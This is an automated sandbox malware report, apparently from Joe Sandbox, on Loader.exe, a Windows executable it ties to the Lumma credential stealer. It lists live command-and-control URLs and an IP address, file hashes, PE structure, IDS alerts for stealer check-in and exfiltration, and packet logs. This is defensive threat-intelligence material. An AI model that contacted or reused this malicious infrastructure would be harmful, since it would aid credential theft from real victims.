            https://property-imper.sbs/apie:0%Avira URL Cloudsafe
            https://property-imper.sbs/?0%Avira URL Cloudsafe
            https://property-imper.sbs/apil0%Avira URL Cloudsafe
            http://crl.m0&w0%Avira URL Cloudsafe
            https://property-imper.sbs/g0%Avira URL Cloudsafe
            https://property-imper.sbs/apiI0%Avira URL Cloudsafe
            https://property-imper.sbs/apiq0%Avira URL Cloudsafe
            https://property-imper.sbs/apil2%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            property-imper.sbs
            172.67.162.84
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://property-imper.sbs/apifalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.m0&wLoader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://duckduckgo.com/chrome_newtabLoader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/ac/?q=Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgLoader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://property-imper.sbs/?Loader.exe, 00000002.00000003.1854807698.000000000378E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1876898594.0000000003791000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://property-imper.sbs/apilLoader.exe, 00000002.00000002.1883330598.0000000003796000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLoader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Loader.exe, 00000002.00000003.1763473279.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730936644.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730824420.0000000005D90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Loader.exe, 00000002.00000003.1763473279.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730936644.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730824420.0000000005D90000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.ecosia.org/newtab/Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://property-imper.sbs/Loader.exe, Loader.exe, 00000002.00000003.1840834198.0000000003791000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1763675830.0000000005D32000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1876916386.000000000377A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883291612.0000000003792000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1763893866.0000000005D31000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1854807698.000000000378E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1876898594.0000000003791000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1840568875.0000000005D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://property-imper.sbs/apie:Loader.exe, 00000002.00000002.1883066535.0000000003718000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://property-imper.sbs/gLoader.exe, 00000002.00000003.1840834198.0000000003791000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://property-imper.sbs/apiILoader.exe, 00000002.00000003.1855174369.0000000003796000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1854660051.0000000003796000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1840746834.0000000003795000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883330598.0000000003796000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLoader.exe, 00000002.00000003.1730936644.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.microsofLoader.exe, 00000002.00000003.1730824420.0000000005D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://property-imper.sbs/apiqLoader.exe, 00000002.00000002.1883066535.0000000003718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLoader.exe, 00000002.00000003.1730936644.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.67.162.84
                                                                        property-imper.sbsUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1561387
                                                                        Start date and time:2024-11-23 09:48:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 4m 34s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:6
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Loader.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 41
                                                                        • Number of non-executed functions: 111
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        03:49:00API Interceptor8x Sleep call for process: Loader.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        172.67.162.84file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.162.84
                                                                                            Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.44.93
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 162.159.61.3
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.33.116
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 172.64.41.3
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                            • 104.20.3.235
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 172.64.41.3
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.33.116
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.162.84
                                                                                            Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.162.84
                                                                                            Solara.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.162.84
                                                                                            No context
                                                                                            No created / dropped files found
                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.732358355383698
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:Loader.exe
                                                                                            File size:500'224 bytes
                                                                                            MD5:0e6fce268473aad13da6aa0c2e93ec94
                                                                                            SHA1:d01b0c69c28b913c4dd3297ca6c78f98d6ba1972
                                                                                            SHA256:bc32cb3d7964088842b7040c23af2bff7f8e07781e8295a3e45871151052e7b7
                                                                                            SHA512:0122f8a058502df27efd7da995a5357f284ed307817f237109ca57891f3cf95959d31fda9b9c5815db0240019ec0a559deb4b2287cd10a70fcfbd9cb59d9ebd9
                                                                                            SSDEEP:12288:FJB+nneDgkXFEIKUciGq/LCgvKXG9DhZiwC0:rAoR2x1iG8LCgN9lZi4
                                                                                            TLSH:BAB4F1AEB3E3A0F3D662183541E49B75456E7E700F2490FB53501F692F36AC28632E57
                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x415870
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                                            Instruction
                                                                                            call 00007FD31C6B321Ah
                                                                                            jmp 00007FD31C6B307Dh
                                                                                            mov ecx, dword ptr [0042B5F0h]
                                                                                            push esi
                                                                                            push edi
                                                                                            mov edi, BB40E64Eh
                                                                                            mov esi, FFFF0000h
                                                                                            cmp ecx, edi
                                                                                            je 00007FD31C6B3216h
                                                                                            test esi, ecx
                                                                                            jne 00007FD31C6B3238h
                                                                                            call 00007FD31C6B3241h
                                                                                            mov ecx, eax
                                                                                            cmp ecx, edi
                                                                                            jne 00007FD31C6B3219h
                                                                                            mov ecx, BB40E64Fh
                                                                                            jmp 00007FD31C6B3220h
                                                                                            test esi, ecx
                                                                                            jne 00007FD31C6B321Ch
                                                                                            or eax, 00004711h
                                                                                            shl eax, 10h
                                                                                            or ecx, eax
                                                                                            mov dword ptr [0042B5F0h], ecx
                                                                                            not ecx
                                                                                            pop edi
                                                                                            mov dword ptr [0042B5ECh], ecx
                                                                                            pop esi
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 14h
                                                                                            and dword ptr [ebp-0Ch], 00000000h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            and dword ptr [ebp-08h], 00000000h
                                                                                            push eax
                                                                                            call dword ptr [0042946Ch]
                                                                                            mov eax, dword ptr [ebp-08h]
                                                                                            xor eax, dword ptr [ebp-0Ch]
                                                                                            mov dword ptr [ebp-04h], eax
                                                                                            call dword ptr [00429430h]
                                                                                            xor dword ptr [ebp-04h], eax
                                                                                            call dword ptr [0042942Ch]
                                                                                            xor dword ptr [ebp-04h], eax
                                                                                            lea eax, dword ptr [ebp-14h]
                                                                                            push eax
                                                                                            call dword ptr [004294A8h]
                                                                                            mov eax, dword ptr [ebp-10h]
                                                                                            lea ecx, dword ptr [ebp-04h]
                                                                                            xor eax, dword ptr [ebp-14h]
                                                                                            xor eax, dword ptr [ebp-04h]
                                                                                            xor eax, ecx
                                                                                            leave
                                                                                            ret
                                                                                            mov eax, 00004000h
                                                                                            ret
                                                                                            push 0042C970h
                                                                                            call dword ptr [00429488h]
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            mov al, 01h
                                                                                            ret
                                                                                            push 00030000h
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            .coS0x310000x4ea000x4ea00358c2236df00894d3b77fbf3f79f36c2False1.000329143481717data7.999351184277866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            DLLImport
                                                                                            KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                            GDI32.dllCreateEllipticRgn
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-23T09:49:00.432707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.162.84443TCP
                                                                                            2024-11-23T09:49:01.107725+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.162.84443TCP
                                                                                            2024-11-23T09:49:01.107725+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.162.84443TCP
                                                                                            2024-11-23T09:49:02.462552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.162.84443TCP
                                                                                            2024-11-23T09:49:03.189450+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.162.84443TCP
                                                                                            2024-11-23T09:49:03.189450+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.162.84443TCP
                                                                                            2024-11-23T09:49:04.724286+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.162.84443TCP
                                                                                            2024-11-23T09:49:08.091904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.162.84443TCP
                                                                                            2024-11-23T09:49:08.818658+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449733172.67.162.84443TCP
                                                                                            2024-11-23T09:49:10.297377+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.162.84443TCP
                                                                                            2024-11-23T09:49:13.021780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.162.84443TCP
                                                                                            2024-11-23T09:49:15.864845+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.162.84443TCP
                                                                                            2024-11-23T09:49:18.622598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.162.84443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 23, 2024 09:48:59.151767015 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:48:59.151854038 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:48:59.151966095 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:48:59.155092001 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:48:59.155128956 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:00.432600975 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:00.432707071 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:00.436986923 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:00.437020063 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:00.437437057 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:00.481507063 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:00.481756926 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:00.481811047 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:00.482057095 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:01.107832909 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:01.108063936 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:01.108266115 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:01.113946915 CET49730443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:01.113981962 CET44349730172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:01.158713102 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:01.158762932 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:01.158859968 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:01.159135103 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:01.159153938 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:02.462483883 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:02.462552071 CET49731443192.168.2.4172.67.162.84
